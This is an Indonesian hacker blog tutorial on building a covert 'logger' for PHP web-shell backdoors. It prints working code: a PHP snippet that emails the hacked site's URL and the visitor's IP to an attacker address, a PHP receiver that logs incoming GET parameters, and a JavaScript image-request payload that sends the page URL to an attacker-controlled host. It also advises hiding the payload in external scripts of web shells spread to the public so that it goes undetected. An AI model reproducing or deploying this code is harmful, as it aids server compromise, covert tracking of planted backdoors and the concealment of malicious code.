Hi cuy, dah lama ga update post di blog ini. Ya karena males aja wkwkwk.
Kemarin saya ada pembahasan sedikit mengenai logger webshell yang pake bahasa php di suatu grup whatsapp.
Kurang lebih isinya seperti berikut:
<?php @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = 'aingheker@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); ?>
Kebanyakan sih, para heker menggunakan script ini sebagai backdoornya backdoor untuk mengakali heker heker dadakan yang gaptek tentang hal ini.
Intinya si heker tinggal menunggu notifikasi email yang datang dengan sendirinya padahal shell itu ditanam oleh heker lain. Mudah bukan?
Namun masalahnya disini. Jika web yang ditanami shell backdoor tersebut tidak support untuk mengirim email, maka logger tersebut juga tidak akan bekerja.
Jadi atas latar belakang diatas, tiba tiba saya kepikiran untuk menulis artikel kali ini. Langsung saja selengkapnya tutorial scroll kebawah.
Disini, bahan utama yang dibutuhkan adalah kamu buat dulu website yang support bahasa php.
Gunanya untuk apa bang? Ya untuk menyimpan hasil logger kalian.
Pertama kalian buat file berekstensi .php dengan nama terserah yang berisi:
<?php $path = $_GET["c"]; $file = fopen('log.txt', 'a'); fwrite($file, $path . "\n\n"); ?>
Disini misalkan saya beri nama log.php
Kemudian untuk ditanamkan di shellnya, kita menggunakan payload javascript seperti berikut:
document.write('<img src="https://websitekamu.com/log.php?c='+document.URL+'" />');
Cara Kerja
Disini cara kerjanya, jika javascript diatas terload pada shell Backdoor maka logger akan bekerja dengan otomatis membuat file bernama log.txt yang berisi letak shell yang tertanam.
Jadi disini kita terlepas entah webnya support email apa tidak, asalkan ada yang membuka shellnya, kita dapat lokasi shellnya.
Untuk javascript yang kamu tanam pada shell backdoor bisa kamu sembunyikan dengan menyatukannya bersama javascript eksternal.
Mana ada heker yang mau repot repot mengecek satu persatu muatan script eksternal pada script backdoor?
Mereka pasti cuma mengira itu hanya sebatas script yang membuat shellnya bekerja.
Dengan teknik ini, kamu juga bisa mengakalinya setelah beberapa hari, minggu, atau bulan setelah shell kamu rilis ke publik.
Setelah itu kamu hanya tinggal menyisipkan logger ini pada javascript eksternal yang tertaut pada shell yang kamu tebar.
Dengan ini, logger nyaris sama sekali tidak akan terdeteksi.
Oh iya, untuk payload di atas saya masih menggunakan img yang yaa kalau gada gambar validnya pasti seperti ini wkwk.
Intinya disini payloadnya dapat kalian modifikasi asalkan tetap bekerja dengan GET url:
https://websitekamu.com/log.php?c='+document.URL+'
Masih belum paham dengan penjelasan diatas? Use your brain. Jangan bilang lo heker dadakan yang kebelet terkenal. pfftt..
Sekian, Cara Membuat Logger Web Shell Backdoor dengan Javascript. Happy hacking!